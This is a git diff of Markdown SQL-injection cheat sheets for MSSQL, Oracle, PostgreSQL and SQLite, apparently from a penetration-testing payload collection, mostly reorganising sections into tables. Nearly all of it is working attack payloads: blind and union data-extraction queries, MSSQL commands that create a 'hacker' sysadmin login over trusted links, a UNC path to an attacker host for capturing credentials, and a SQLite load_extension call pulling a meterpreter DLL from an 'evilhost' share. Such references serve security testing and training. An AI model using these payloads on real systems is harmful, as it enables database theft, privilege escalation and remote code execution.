diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 8356dac..f1f4adb 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -7,17 +7,15 @@ * [MSSQL Default Databases](#mssql-default-databases) * [MSSQL Comments](#mssql-comments) -* [MSSQL User](#mssql-user) -* [MSSQL Version](#mssql-version) -* [MSSQL Hostname](#mssql-hostname) -* [MSSQL Database Name](#mssql-database-name) * [MSSQL Database Credentials](#mssql-database-credentials) -* [MSSQL List Databases](#mssql-list-databases) -* [MSSQL List Columns](#mssql-list-columns) -* [MSSQL List Tables](#mssql-list-tables) +* [MSSQL Enumeration](#mssql-enumeration) + * [MSSQL List Databases](#mssql-list-databases) + * [MSSQL List Columns](#mssql-list-columns) + * [MSSQL List Tables](#mssql-list-tables) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) + * [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent) * [MSSQL Time Based](#mssql-time-based) * [MSSQL Stacked Query](#mssql-stacked-query) * [MSSQL Read File](#mssql-read-file) @@ -27,9 +25,10 @@ * [MSSQL Out of Band](#mssql-out-of-band) * [MSSQL DNS Exfiltration](#mssql-dns-exfiltration) * [MSSQL UNC Path](#mssql-unc-path) -* [MSSQL Make User DBA](#mssql-make-user-dba) * [MSSQL Trusted Links](#mssql-trusted-links) -* [MSSQL List Permissions](#mssql-list-permissions) +* [MSSQL Privileges](#mssql-privileges) + * [MSSQL List Permissions](#mssql-list-permissions) + * [MSSQL Make User DBA](#mssql-make-user-dba) * [References](#references) @@ -54,39 +53,6 @@ | `;%00` | Null byte | -## MSSQL User - -```sql -SELECT CURRENT_USER -SELECT user_name(); -SELECT system_user; -SELECT user; -``` - -## MSSQL Version - -```sql -SELECT @@version -``` - -## MSSQL Hostname - -```sql -SELECT HOST_NAME() -SELECT @@hostname -SELECT @@SERVERNAME -SELECT SERVERPROPERTY('productversion') -SELECT SERVERPROPERTY('productlevel') -SELECT SERVERPROPERTY('edition'); -``` - -## MSSQL Database Name - -```sql -SELECT DB_NAME() -``` - - ## MSSQL Database Credentials * **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` @@ -102,58 +68,100 @@ SELECT DB_NAME() ``` -## MSSQL List Databases +## MSSQL Enumeration + +| Description | SQL Query | +| ------------- | ----------------------------------------- | +| DBMS version | `SELECT @@version` | +| Database name | `SELECT DB_NAME()` | +| Hostname | `SELECT HOST_NAME()` | +| Hostname | `SELECT @@hostname` | +| Hostname | `SELECT @@SERVERNAME` | +| Hostname | `SELECT SERVERPROPERTY('productversion')` | +| Hostname | `SELECT SERVERPROPERTY('productlevel')` | +| Hostname | `SELECT SERVERPROPERTY('edition')` | +| User | `SELECT CURRENT_USER` | +| User | `SELECT user_name();` | +| User | `SELECT system_user;` | +| User | `SELECT user;` | + + +### MSSQL List Databases ```sql SELECT name FROM master..sysdatabases; -SELECT DB_NAME(N); — for N = 0, 1, 2, … -SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+) + +-- for N = 0, 1, 2, … +SELECT DB_NAME(N); + +-- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb +-- (Only works in MSSQL 2017+) +SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; ``` -## MSSQL List Columns +### MSSQL List Columns ```sql -SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only -SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable +-- for the current DB only +SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); + +-- list column names and types for master..sometable +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; SELECT table_catalog, column_name FROM information_schema.columns ``` -## MSSQL List Tables +### MSSQL List Tables ```sql -SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views +-- use xtype = 'V' for views +SELECT name FROM master..sysobjects WHERE xtype = 'U'; + SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; -SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable + +-- list column names and types for master..sometable +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; SELECT table_catalog, table_name FROM information_schema.columns -SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) + +-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) +SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; ``` ## MSSQL Union Based -```sql --- extract databases names -$ SELECT name FROM master..sysdatabases -[*] Injection -[*] msdb -[*] tempdb +* Extract databases names --- extract tables from Injection database -$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' -[*] Profiles -[*] Roles -[*] Users + ```sql + $ SELECT name FROM master..sysdatabases + [*] Injection + [*] msdb + [*] tempdb + ``` --- extract columns for the table Users -$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users') -[*] UserId -[*] UserName +* Extract tables from Injection database --- Finally extract the data -$ SELECT UserId, UserName from Users -``` + ```sql + $ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' + [*] Profiles + [*] Roles + [*] Users + ``` + +* Extract columns for the table Users + + ```sql + $ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users') + [*] UserId + [*] UserName + ``` + +* Finally extract the data + + ```sql + $ SELECT UserId, UserName from Users + ``` ## MSSQL Error Based @@ -179,14 +187,26 @@ $ SELECT UserId, UserName from Users AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- - ``` +```sql +SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' +WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) +SELECT message FROM data WHERE row = 1 and message like 't%' +``` + + +### MSSQL Blind With Substring Equivalent + +| Function | Example | +| ----------- | ----------------------------------------------- | +| `SUBSTRING` | `SUBSTRING('foobar', , )` | + +Examples: + ```sql AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97 AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90 -SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' -WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) -SELECT message FROM data WHERE row = 1 and message like 't%' ``` @@ -312,12 +332,6 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' ``` -## MSSQL Make User DBA - -```sql -EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -``` - ## MSSQL Trusted Links > The links between databases work even across forest trusts. @@ -349,32 +363,43 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` -## List Permissions -Listing effective permissions of current user on the server. +## MSSQL Privileges + +### MSSQL List Permissions + +* Listing effective permissions of current user on the server. + + ```sql + SELECT * FROM fn_my_permissions(NULL, 'SERVER'); + ``` + +* Listing effective permissions of current user on the database. + + ```sql + SELECT * FROM fn_my_permissions (NULL, 'DATABASE'); + ``` + +* Listing effective permissions of current user on a view. + + ```sql + SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; + ``` + +* Check if current user is a member of the specified server role. + + ```sql + -- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin + SELECT is_srvrolemember('sysadmin'); + ``` + + +### MSSQL Make User DBA ```sql -SELECT * FROM fn_my_permissions(NULL, 'SERVER'); +EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` -Listing effective permissions of current user on the database. - -```sql -SELECT * FROM fn_my_permissions (NULL, 'DATABASE'); -``` - -Listing effective permissions of current user on a view. - -``` -SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; -``` - -Check if current user is a member of the specified server role. - -```sql --- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin -SELECT is_srvrolemember('sysadmin'); -``` ## MSSQL OPSEC diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index f6fed02..bad7a21 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -16,6 +16,7 @@ * [Oracle SQL List Tables](#oracle-sql-list-tables) * [Oracle SQL Error Based](#oracle-sql-error-based) * [Oracle SQL Blind](#oracle-sql-blind) + * [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent) * [Oracle SQL Time Based](#oracle-sql-time-based) * [Oracle SQL Out of Band](#oracle-sql-out-of-band) * [Oracle SQL Command Execution](#oracle-sql-command-execution) @@ -129,6 +130,13 @@ When the injection point is inside a string use : `'||PAYLOAD--` | First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` | +### Oracle Blind With Substring Equivalent + +| Function | Example | +| ----------- | ----------------------------------------- | +| `SUBSTR` | `SUBSTR('foobar', , )` | + + ## Oracle SQL Time Based ```sql diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 22da428..5e21ab2 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -15,6 +15,7 @@ * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) + * [PostgreSQL Blind With Substring Equivalent](#postgresql-blind-with-substring-equivalent) * [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Out of Band](#postgresql-out-of-band) * [PostgreSQL Stacked Query](#postgresql-stacked-query) @@ -119,11 +120,22 @@ Note, with the above queries, the output needs to be assembled in memory. For la ## PostgreSQL Blind +### PostgreSQL Blind With Substring Equivalent + +| Function | Example | +| ----------- | ----------------------------------------------- | +| `SUBSTR` | `SUBSTR('foobar', , )` | +| `SUBSTRING` | `SUBSTRING('foobar', , )` | +| `SUBSTRING` | `SUBSTRING('foobar' FROM FOR )` | + +Examples: + ```sql ' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE ' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE ``` + ## PostgreSQL Time Based #### Identify Time Based diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 2524f15..d4b102c 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -7,15 +7,14 @@ * [SQLite Comments](#sqlite-comments) * [SQLite Version](#sqlite-version) -* [String Based - Extract Database Structure](#string-based---extract-database-structure) -* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name) -* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name) -* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables) -* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name) -* [Boolean - Extract Info](#boolean---extract-info) -* [Boolean - Error Based](#boolean---error-based) -* [Time Based](#time-based) -* [Remote Code Execution](#remote-code-execution) +* [SQLite String](#sqlite-string) + * [SQLite String Methodology](#sqlite-string-methodology) +* [SQLite Blind](#sqlite-blind) + * [SQLite Blind Methodology](#sqlite-blind-methodology) + * [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent) +* [SQlite Error Based](#sqlite-error-based) +* [SQlite Time Based](#sqlite-time-based) +* [SQlite Remote Code Execution](#sqlite-remote-code-execution) * [Attach Database](#attach-database) * [Load_extension](#load_extension) * [References](#references) @@ -23,10 +22,11 @@ ## SQLite Comments -```sql --- -/**/ -``` +| Type | Description | +|----------------------------|-----------------------------------| +| `/* SQLite Comment */` | C-style comment | +| `--` | SQL comment | + ## SQLite Version @@ -34,82 +34,54 @@ select sqlite_version(); ``` +## SQLite String -## String Based - Extract Database Structure +### SQLite String Methodology -```sql -SELECT sql FROM sqlite_schema -``` -if sqlite_version > 3.33.0 -```sql -SELECT sql FROM sqlite_master -``` +| Description | SQL Query | +| ----------------------- | ----------------------------------------- | +| Extract Database Structure | `SELECT sql FROM sqlite_schema` | +| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` | +| Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` | +| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` | +| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` | -## Integer/String Based - Extract Table Name +## SQLite Blind -```sql -SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' -``` +### SQLite Blind Methodology + +| Description | SQL Query | +| ----------------------- | ----------------------------------------- | +| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` | +| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` | +| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` | +| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN ELSE END` | -## Integer/String Based - Extract Column Name +### SQLite Blind With Substring Equivalent -```sql -SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' -``` - -For a clean output - -```sql -SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' -``` - -Cleaner output - -```sql -SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name'); -``` +| Function | Example | +| ----------- | ----------------------------------------- | +| `SUBSTRING` | `SUBSTRING('foobar', , )` | +| `SUBSTR` | `SUBSTR('foobar', , )` | -## Boolean - Count Number Of Tables - -```sql -and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table -``` - -## Boolean - Enumerating Table Name - -```sql -and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number -``` - -## Boolean - Extract Info - -```sql -and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') -``` - -### Boolean - Extract Info (order by) - -```sql -CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN ELSE END -``` - -## Boolean - Error Based +## SQlite Error Based ```sql AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END ``` -## Time Based + +## SQlite Time Based ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` -## Remote Code Execution +## SQLite Remote Code Execution ### Attach Database @@ -121,11 +93,12 @@ INSERT INTO lol.pwn (dataz) VALUES ("");-- ### Load_extension +:warning: This component is disabled by default. + ```sql UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- ``` -Note: By default this component is disabled. ## References